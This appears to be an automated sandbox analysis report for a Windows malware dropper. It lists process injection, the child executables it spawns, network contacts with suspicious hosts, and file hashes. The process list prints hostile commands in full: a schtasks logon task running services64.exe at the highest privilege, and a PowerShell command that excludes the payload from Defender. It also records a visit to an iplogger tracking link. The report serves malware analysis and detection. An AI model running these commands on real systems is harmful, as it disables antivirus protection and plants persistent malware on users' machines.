PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe" -a

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487156 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 988

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
N/A 127.0.0.1:49262 tcp
N/A 127.0.0.1:49264 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 184.50.113.144:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 72.246.29.11:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
GB 142.250.178.3:80 c.pki.goog tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 sanctam.net udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 3394285ab7e1ef48bc775f71ed7b0a76
SHA1 646fadf1a0a0dafe07319c86de0587ed96a0fc2b
SHA256 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467
SHA512 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

memory/2704-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-59-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

memory/1912-131-0x0000000000A70000-0x0000000000BB2000-memory.dmp

memory/1784-130-0x0000000000840000-0x000000000092E000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

memory/660-140-0x0000000000950000-0x000000000097C000-memory.dmp

memory/2420-139-0x0000000000D00000-0x0000000000D08000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1744-153-0x0000000000270000-0x0000000000354000-memory.dmp

memory/3036-142-0x0000000002370000-0x0000000002454000-memory.dmp

memory/2692-138-0x000000013FC70000-0x000000013FC80000-memory.dmp

memory/660-159-0x0000000000140000-0x0000000000146000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2704-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2704-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/660-160-0x0000000000150000-0x0000000000170000-memory.dmp

memory/660-161-0x0000000000170000-0x0000000000176000-memory.dmp

memory/1912-162-0x0000000000270000-0x0000000000282000-memory.dmp

memory/2704-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-170-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-169-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-167-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2704-164-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-163-0x0000000000400000-0x0000000000A07000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabBE81.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarBEA3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/564-225-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/2496-226-0x0000000000400000-0x0000000003346000-memory.dmp

memory/2692-229-0x00000000006C0000-0x00000000006CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/1716-233-0x000000013FDA0000-0x000000013FDB0000-memory.dmp

memory/1912-234-0x00000000087E0000-0x000000000886C000-memory.dmp

memory/1912-235-0x00000000007A0000-0x00000000007BE000-memory.dmp

memory/1360-245-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1360-242-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-240-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-238-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-236-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-246-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-250-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 799f3adcfbb6596256a7c7b1e0237480
